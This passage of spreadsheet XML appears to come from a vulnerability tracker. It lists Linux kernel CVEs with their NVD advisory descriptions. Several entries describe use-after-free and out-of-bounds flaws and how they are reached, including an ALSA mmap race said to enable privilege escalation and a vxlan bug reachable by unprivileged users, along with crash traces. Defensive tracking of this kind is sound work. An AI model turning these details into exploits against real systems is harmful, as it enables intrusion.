      <c r="A111" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B111" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C111" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97991</t>
        </is>
      </c>
      <c r="D111" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E111" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F111" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G111" s="5" t="inlineStr"/>
      <c r="H111" s="5" t="inlineStr"/>
      <c r="I111" s="5" t="inlineStr"/>
      <c r="J111" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K111" s="5" t="inlineStr"/>
      <c r="L111" s="5" t="inlineStr"/>
      <c r="M111" s="5" t="inlineStr"/>
      <c r="N111" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O111" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P111" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q111" s="5" t="inlineStr"/>
      <c r="R111" s="5" t="inlineStr"/>
      <c r="S111" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
vdpa_sim_blk: reject out-of-range sector starts
vdpasim_blk_check_range() logs an invalid start sector but continues
validating the request.  The subsequent unsigned capacity subtraction can
underflow and let an out-of-range buffer offset reach the data path.
The invalid offset is used by three request paths.  VIRTIO_BLK_T_OUT
copies guest data to blk-&gt;buffer + offset through
vringh_iov_pull_iotlb(), causing an out-of-bounds write in
_copy_from_iter() or memcpy().  VIRTIO_BLK_T_IN copies from
blk-&gt;buffer + offset to the guest through vringh_iov_push_iotlb(),
causing an out-of-bounds read in _copy_to_iter().
VIRTIO_BLK_T_WRITE_ZEROES passes blk-&gt;buffer + offset to memset(),
causing an out-of-bounds write.
Reject starts at or beyond the capacity before the subtraction.  Treat the
capacity boundary as invalid because the IN and OUT paths round byte counts
down to sectors for validation but later copy the original byte counts.  A
sub-sector request at the capacity boundary would otherwise still access
past the end of the buffer.
I found this bug myself, though the patch was written with AI assistance.</t>
        </is>
      </c>
      <c r="T111" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97991</t>
        </is>
      </c>
    </row>
    <row r="112">
      <c r="A112" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B112" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C112" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98002</t>
        </is>
      </c>
      <c r="D112" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E112" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F112" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G112" s="5" t="inlineStr"/>
      <c r="H112" s="5" t="inlineStr"/>
      <c r="I112" s="5" t="inlineStr"/>
      <c r="J112" s="5" t="inlineStr"/>
      <c r="K112" s="5" t="inlineStr"/>
      <c r="L112" s="5" t="inlineStr"/>
      <c r="M112" s="5" t="inlineStr"/>
      <c r="N112" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O112" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P112" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q112" s="5" t="inlineStr"/>
      <c r="R112" s="5" t="inlineStr"/>
      <c r="S112" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iommu/amd: Fix ineffective error check in nested domain allocation
amd_iommu_pdom_id_alloc() returns an int: a domain ID on success, or the
negative errno from ida_alloc_range() when the ID space is exhausted or
memory is short.  amd_iommu_alloc_domain_nested() stores that return value
in gdom_info-&gt;hdom_id, which is a u32, and only then tests it:
	gdom_info-&gt;hdom_id = amd_iommu_pdom_id_alloc();
	if (gdom_info-&gt;hdom_id &lt;= 0) {
The assignment discards the sign, so -ENOSPC becomes 0xffffffe4 and the
test never fires.  The nested domain is then set up with a host domain ID
that was never allocated, instead of the allocation failing with -ENOSPC.
Keep the value in an int, test it there, and store it only once it is
known to be valid, which is what the other amd_iommu_pdom_id_alloc()
callers already do.</t>
        </is>
      </c>
      <c r="T112" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98002</t>
        </is>
      </c>
    </row>
    <row r="113">
      <c r="A113" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B113" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C113" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98017</t>
        </is>
      </c>
      <c r="D113" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E113" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F113" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G113" s="5" t="inlineStr"/>
      <c r="H113" s="5" t="inlineStr"/>
      <c r="I113" s="5" t="inlineStr"/>
      <c r="J113" s="5" t="inlineStr"/>
      <c r="K113" s="5" t="inlineStr"/>
      <c r="L113" s="5" t="inlineStr"/>
      <c r="M113" s="5" t="inlineStr"/>
      <c r="N113" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O113" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P113" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q113" s="5" t="inlineStr"/>
      <c r="R113" s="5" t="inlineStr"/>
      <c r="S113" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/sched: defer qdisc freeing after failed creation
An RTM_NEWQDISC request can make clsact bind a populated shared ingress
block during -&gt;init(), publishing an embedded mini_Qdisc to lockless
readers.  If the same request has an invalid TCA_RATE, estimator setup
fails after -&gt;init(); the unwind removes the pointer but synchronously
frees its containing qdisc while tc_run() may still hold it.
Retire failed qdiscs through the same RCU helper as normal destruction.
Inline the synchronous free into the callback now that no direct callers
remain.</t>
        </is>
      </c>
      <c r="T113" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98017</t>
        </is>
      </c>
    </row>
    <row r="114">
      <c r="A114" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B114" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C114" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98023</t>
        </is>
      </c>
      <c r="D114" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E114" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F114" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G114" s="5" t="inlineStr"/>
      <c r="H114" s="5" t="inlineStr"/>
      <c r="I114" s="5" t="inlineStr"/>
      <c r="J114" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K114" s="5" t="inlineStr"/>
      <c r="L114" s="5" t="inlineStr"/>
      <c r="M114" s="5" t="inlineStr"/>
      <c r="N114" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O114" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P114" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q114" s="5" t="inlineStr"/>
      <c r="R114" s="5" t="inlineStr"/>
      <c r="S114" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
vxlan: reject dynamic fdb entries that reference a nexthop id
The commit cited in the Fixes tag allowed VXLAN FDB entries to point to
FDB nexthops so that overlay traffic could be load balanced across
multiple VTEPs. Such entries can only be configured from user space,
cannot be learned and cannot roam. They only make sense with a user space
control plane such as E-VPN where data plane learning is disabled.
Despite that, the VXLAN driver does not currently prevent such entries
from being configured with the "dynamic" flag. The per-nexthop FDB list
is only protected by the per-device hash lock, which is not sufficient
when two VXLAN devices point to the same FDB nexthop and therefore share
the list. Aging runs in softirq context without RTNL, so an entry deleted
by one device can race with an addition or deletion from the other,
leading to list corruption:
  list_del corruption. next-&gt;prev should be ffff8881069d9548, but was
  dead000000000122. (next=ffff8881069d9448)
  WARNING: CPU: 0 PID: 90 at lib/list_debug.c:65
  __list_del_entry_valid_or_report+0x1aa/0x210
  ...
   vxlan_fdb_destroy+0x5b8/0xad0
   vxlan_cleanup+0x328/0x450
   call_timer_fn+0x2a/0x1c0
   run_timer_softirq+0x18c/0x210
  BUG: KASAN: slab-use-after-free in vxlan_fdb_destroy
Fix this by rejecting the bogus configuration of dynamic FDB entries that
point to FDB nexthops, both when created and when an existing entry is
updated. As such, the per-nexthop FDB list is only ever mutated under the
RTNL lock. Add test cases to make sure that this does not regress in the
future.</t>
        </is>
      </c>
      <c r="T114" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98023</t>
        </is>
      </c>
    </row>
    <row r="115">
      <c r="A115" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B115" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C115" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98052</t>
        </is>
      </c>
      <c r="D115" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E115" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F115" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G115" s="5" t="inlineStr"/>
      <c r="H115" s="5" t="inlineStr"/>
      <c r="I115" s="5" t="inlineStr"/>
      <c r="J115" s="5" t="inlineStr"/>
      <c r="K115" s="5" t="inlineStr"/>
      <c r="L115" s="5" t="inlineStr"/>
      <c r="M115" s="5" t="inlineStr"/>
      <c r="N115" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O115" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P115" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q115" s="5" t="inlineStr"/>
      <c r="R115" s="5" t="inlineStr"/>
      <c r="S115" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: bcmasp: clear txcb-&gt;last before writing each descriptor
bcmasp_xmit() only wrote txcb-&gt;last = true for the final fragment
of an SKB; non-final fragments left the field untouched.  If a
descriptor slot was reused while it still held a stale true from
a previous SKB (possible when tx_spb_ring_full() underreported
fullness), bcmasp_tx_reclaim() would see last == true mid-SKB and
call dev_consume_skb_any() prematurely, freeing the sk_buff while
its remaining fragments were still in flight.
Unconditionally clear txcb-&gt;last before the conditional set so every
descriptor slot starts from a known false state regardless of what a
prior transmission left behind.</t>
        </is>
      </c>
      <c r="T115" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98052</t>
        </is>
      </c>
    </row>
    <row r="116">
      <c r="A116" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B116" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C116" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98073</t>
        </is>
      </c>
      <c r="D116" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E116" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F116" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G116" s="5" t="inlineStr"/>
      <c r="H116" s="5" t="inlineStr"/>
      <c r="I116" s="5" t="inlineStr"/>
      <c r="J116" s="5" t="inlineStr">
        <is>
          <t>f5, go, gin</t>
        </is>
      </c>
      <c r="K116" s="5" t="inlineStr"/>
      <c r="L116" s="5" t="inlineStr"/>
      <c r="M116" s="5" t="inlineStr"/>
      <c r="N116" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O116" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P116" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q116" s="5" t="inlineStr"/>
      <c r="R116" s="5" t="inlineStr"/>
      <c r="S116" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: Remove conflicting altnames for dying netns in __dev_change_net_namespace().
syzbot reported the warning in cfg80211_pernet_exit(). [0]
The repro does the following:
  1. create two device in root netns and non-root netns
  2. assign the same altname for the two devices
  3. remove the non-root netns
Since commit 7663d522099e ("net: check for altname conflicts
when changing netdev's netns"), cfg80211_switch_netns() and
cfg802154_switch_netns() fail if init_net has a device with the
conflicting altname.
default_device_exit_net() had the same issue and commit d09486a04f5d
("net: fix removing a namespace with conflicting altnames") fixed it.
cfg80211_pernet_exit() and cfg802154_pernet_exit() need the same fix.
Let's generalise the fix by removing conflicting altnames for dying
netns in __dev_change_net_namespace().
[0]:
cfg80211_switch_netns(rdev, &amp;init_net)
WARNING: net/wireless/core.c:1871 at cfg80211_pernet_exit+0xd5/0x120 net/wireless/core.c:1871, CPU#1: kworker/u8:9/1160
Modules linked in:
CPU: 1 UID: 0 PID: 1160 Comm: kworker/u8:9 Not tainted syzkaller #0 PREEMPT(full)
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 07/24/2026
Workqueue: netns cleanup_net
RIP: 0010:cfg80211_pernet_exit+0xd5/0x120 net/wireless/core.c:1871
Code: e8 03 42 80 3c 20 00 74 08 4c 89 f7 e8 b4 ef 0e f7 4d 8b 36 49 81 fe 20 10 4a 90 74 12 e8 03 3d 9f f6 eb 85 e8 fc 3c 9f f6 90 &lt;0f&gt; 0b 90 eb cc e8 f1 3c 9f f6 eb 05 e8 ea 3c 9f f6 5b 41 5c 41 5e
RSP: 0018:ffffc900057a78f0 EFLAGS: 00010293
RAX: ffffffff8b287154 RBX: ffff88807ba72780 RCX: ffff8880213e8000
RDX: 0000000000000000 RSI: 00000000ffffffef RDI: 0000000000000000
RBP: 00000000ffffffef R08: ffffffff9024cc67 R09: 0000000000000000
R10: fffff52000af4eb0 R11: fffffbfff204998d R12: dffffc0000000000
R13: ffffffff904a1080 R14: ffff888144ed0008 R15: ffff888144ed0e20
FS:  0000000000000000(0000) GS:ffff888124de6000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 00005642de0a8a70 CR3: 000000007a40c000 CR4: 00000000003526f0
Call Trace:
 &lt;TASK&gt;
 ops_exit_list net/core/net_namespace.c:200 [inline]
 ops_undo_list+0x43d/0x8d0 net/core/net_namespace.c:253
 cleanup_net+0x572/0x810 net/core/net_namespace.c:706
 process_one_work kernel/workqueue.c:3387 [inline]
 process_scheduled_works+0xc3d/0x1630 kernel/workqueue.c:3470
 worker_thread+0xa47/0xfb0 kernel/workqueue.c:3551
 kthread+0x38b/0x480 kernel/kthread.c:436
 ret_from_fork+0x514/0xb70 arch/x86/kernel/process.c:158
 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245
 &lt;/TASK&gt;</t>
        </is>
      </c>
      <c r="T116" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98073</t>
        </is>
      </c>
    </row>
    <row r="117">
      <c r="A117" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B117" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C117" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98112</t>
        </is>
      </c>
      <c r="D117" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E117" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F117" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G117" s="5" t="inlineStr"/>
      <c r="H117" s="5" t="inlineStr"/>
      <c r="I117" s="5" t="inlineStr"/>
      <c r="J117" s="5" t="inlineStr"/>
      <c r="K117" s="5" t="inlineStr"/>
      <c r="L117" s="5" t="inlineStr"/>
      <c r="M117" s="5" t="inlineStr"/>
      <c r="N117" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O117" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P117" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q117" s="5" t="inlineStr"/>
      <c r="R117" s="5" t="inlineStr"/>
      <c r="S117" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ksmbd: fix listener task lifetime on netdev events
The listener thread exits when its listening socket is shutdown. The
netdevice notifier shuts down the socket before calling kthread_stop(), so
the task_struct can be freed before kthread_stop() gets its reference.
Create the listener in a stopped state and hold an extra task_struct
reference until kthread_stop_put() completes. Also stop and release
listeners before freeing their interface records during TCP teardown.</t>
        </is>
      </c>
      <c r="T117" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98112</t>
        </is>
      </c>
    </row>
    <row r="118">
      <c r="A118" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B118" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C118" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98116</t>
        </is>
      </c>
      <c r="D118" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E118" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F118" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G118" s="5" t="inlineStr"/>
      <c r="H118" s="5" t="inlineStr"/>
      <c r="I118" s="5" t="inlineStr"/>
      <c r="J118" s="5" t="inlineStr"/>
      <c r="K118" s="5" t="inlineStr"/>
      <c r="L118" s="5" t="inlineStr"/>
      <c r="M118" s="5" t="inlineStr"/>
      <c r="N118" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O118" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P118" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q118" s="5" t="inlineStr"/>
      <c r="R118" s="5" t="inlineStr"/>
      <c r="S118" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ALSA: pcm: Serialize PCM mmap with buffer reallocation to fix page UAF
snd_pcm_hw_params() and snd_pcm_hw_free() guard buffer reallocation
with an mmap_count check performed under the PCM stream lock, but the
lock is released long before the buffer is actually freed:
snd_pcm_sync_stop(), constraint refinement and do_free_pages() all
happen in between.  snd_pcm_mmap_data(), on the other hand, takes no
lock at all: it validates against the old buffer's state and
dma_bytes, remaps its pages into the VMA, and only then increments
mmap_count.
A concurrent mmap() can therefore slip in between the check and the
free.  remap_pfn_range() installs writable PTEs for the old buffer's
pages without taking page references, and the subsequent
do_free_pages() returns those pages to the page allocator while the
VMA still maps them.  This leaves a stale, writable mapping of freed
pages: a page-level use-after-free that can be leveraged for local
privilege escalation.
Make snd_pcm_mmap_data() participate in the buffer-access scheme
introduced for hw_params/hw_free: acquire runtime-&gt;buffer_accessing
before validating and remapping, and release it afterwards.  Buffer
reallocation already fails with -EBUSY while accessors are active,
and the mmap side now fails with -EBUSY while a reallocation is in
progress, so the validate/remap sequence and the check/free sequence
can no longer interleave.
A reproducer that turns this race into a stale writable mapping of
the freed DMA buffer pages is available on request.</t>
        </is>
      </c>
      <c r="T118" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98116</t>
        </is>
      </c>
    </row>
    <row r="119">
      <c r="A119" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B119" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C119" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98122</t>
        </is>
      </c>
      <c r="D119" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E119" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F119" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G119" s="5" t="inlineStr"/>
      <c r="H119" s="5" t="inlineStr"/>
      <c r="I119" s="5" t="inlineStr"/>
      <c r="J119" s="5" t="inlineStr">
        <is>
          <t>express</t>
        </is>
      </c>
      <c r="K119" s="5" t="inlineStr"/>
      <c r="L119" s="5" t="inlineStr"/>
      <c r="M119" s="5" t="inlineStr"/>
      <c r="N119" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O119" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P119" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q119" s="5" t="inlineStr"/>
      <c r="R119" s="5" t="inlineStr"/>
      <c r="S119" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
vxlan: mdb: Fix use-after-free in vxlan_mdb_remote_src_del()
vxlan_mdb_is_valid_source(), which validates MDBE_ATTR_SOURCE and every
MDBE_ATTR_SRC_LIST member, accepts the all-zeros address.
A source list is only accepted on a (*, G) entry, whose source is the
all-zeros address, and for each member of the list an (S, G) entry is
derived from it by substituting the source. Entries are keyed by a plain
memcmp() of struct vxlan_mdb_entry_key, so if MDBE_ATTR_SOURCE is present
and holds the all-zeros address and the source list holds it as well, the
derived (S, G) key is byte-identical to the (*, G) key and resolves to the
same entry. Omitting MDBE_ATTR_SOURCE is not equivalent, as the key is
then left with a zero address family.
vxlan_mdb_remote_src_del() removes the forwarding entry of a source before
freeing the source entry:
	vxlan_mdb_remote_src_fwd_del(vxlan, group, remote, &amp;ent-&gt;addr);
	vxlan_mdb_remote_src_entry_del(ent);
With the keys aliased, the first call deletes the remote of the entry that
owns 'ent' instead of a separate (S, G) entry, and frees 'ent'. The second
call then runs on the freed entry, and its hlist_del() reads -&gt;pprev and
-&gt;next out of it and writes through them.
Adding the (*, G) entry with NLM_F_REPLACE and no source list marks the
all-zeros source for deletion and reaches this from the sweep at the end
of vxlan_mdb_remote_srcs_replace().
  BUG: KASAN: slab-use-after-free in __vxlan_mdb_add+0x1cd/0xd70
  Read of size 8 at addr ffff888102852500 by task poc/84
   __vxlan_mdb_add+0x1cd/0xd70
   vxlan_mdb_add+0xc0/0x140
   rtnl_mdb_add+0x157/0x2a0
   rtnetlink_rcv_msg+0x207/0x5a0
  Allocated by task 84:
   __kmalloc_cache_noprof+0x153/0x360
   vxlan_mdb_remote_srcs_add+0x2eb/0x440
   __vxlan_mdb_add+0x803/0xd70
  Freed by task 84:
   kfree+0x14c/0x3b0
   vxlan_mdb_remote_del+0x129/0x1a0
   __vxlan_mdb_del+0x4f/0xe0
   vxlan_mdb_remote_src_fwd_del.isra.0+0x162/0x1b0
   __vxlan_mdb_add+0x1c5/0xd70
The MDB operations are netns-scoped, so an unprivileged user can perform
them in a new user and network namespace.
Reject the all-zeros address in vxlan_mdb_is_valid_source(), which covers
both call sites. A (*, G) entry is expressed by omitting the source, so
nothing legitimate is refused.
Discovered by XBOW, triaged by Baul Lee &lt;baul.lee@xbow.com&gt;</t>
        </is>
      </c>
      <c r="T119" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98122</t>
        </is>
      </c>
    </row>
    <row r="120">
      <c r="A120" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B120" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C120" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98143</t>
        </is>
      </c>
      <c r="D120" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E120" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F120" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G120" s="5" t="inlineStr"/>
      <c r="H120" s="5" t="inlineStr"/>
      <c r="I120" s="5" t="inlineStr"/>
      <c r="J120" s="5" t="inlineStr"/>
      <c r="K120" s="5" t="inlineStr"/>
      <c r="L120" s="5" t="inlineStr"/>
      <c r="M120" s="5" t="inlineStr"/>
      <c r="N120" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O120" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P120" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q120" s="5" t="inlineStr"/>
      <c r="R120" s="5" t="inlineStr"/>
      <c r="S120" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
accel: ethosu: Don't read the U65 rounding mode as a storage mode
Bits 15:14 of NPU_SET_{IFM,OFM}_PRECISION select the activation storage
mode on U85 only. On U65 the same field holds the rounding mode, and the
command stream parser has read it as a storage mode since the driver was
added.
That went unnoticed while unknown values fell through the switch, but
now that they are rejected, every U65 command stream that asks for
natural rounding (2) fails CMDSTREAM_BO_CREATE with -EINVAL. Mesa emits
it for average pooling, concatenation, split, unpack, strided slice, LUT
and argmax, which is 72 failures of the Teflon test suite on an i.MX93.
Truncating rounding (1) is misread as well: it picks the two-tile
address path and computes a bogus feature map size from tile bases the
command stream never set.
Read the field as a storage mode only on the hardware where it is one.</t>
        </is>
      </c>
      <c r="T120" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98143</t>
        </is>
      </c>
    </row>
    <row r="121">
      <c r="A121" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B121" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C121" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98156</t>
        </is>
      </c>
      <c r="D121" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E121" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F121" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G121" s="5" t="inlineStr"/>
      <c r="H121" s="5" t="inlineStr"/>
      <c r="I121" s="5" t="inlineStr"/>
      <c r="J121" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K121" s="5" t="inlineStr"/>
      <c r="L121" s="5" t="inlineStr"/>
      <c r="M121" s="5" t="inlineStr"/>
      <c r="N121" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O121" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P121" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q121" s="5" t="inlineStr"/>
      <c r="R121" s="5" t="inlineStr"/>
      <c r="S121" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/virtio: use the DMA API for resource backing on Xen
On a Xen PV domain page addresses bear no relation to the real machine
addresses the host would have to use to reach it.
virtio_ring.c handles this correctly, vring_use_map_api() returns true
for any xen_domain() regardless of VIRTIO_F_ACCESS_PLATFORM.
virtio-gpu makes the same decision independently, but its copy
looks only at the feature bit:
	bool use_dma_api = !virtio_has_dma_quirk(vgdev-&gt;vdev);
QEMU does not set iommu_platform on virtio-vga by default, so
VIRTIO_F_ACCESS_PLATFORM is not negotiated, use_dma_api is false, and
virtio_gpu_object_shmem_init() describes the framebuffer's backing pages
to the host with sg_phys().  Those are guest-physical addresses. In a PV
domain they resolve, on the host side, to pages belonging to some other
domain, so the host scans out unrelated memory.
Move the decision into virtio_gpu_use_dma_api() and give it the
xen_domain() check, like vring_use_map_api() has. This
additionally enables the dma_sync_sgtable_for_device() calls in
virtgpu_vq.c, which are required for correctness whenever swiotlb
is in play.
Reproduced with a Xen 4.21 PV dom0 nested inside QEMU 8.2 with
virtio-vga, on both a distro 6.8 kernel and 6.18 LTS. A PVH dom0
works fine and doesn't need this fix because it is identity-mapped,
only PV dom0s are affected.</t>
        </is>
      </c>
      <c r="T121" s="6" t="inlineStr">
        <is>
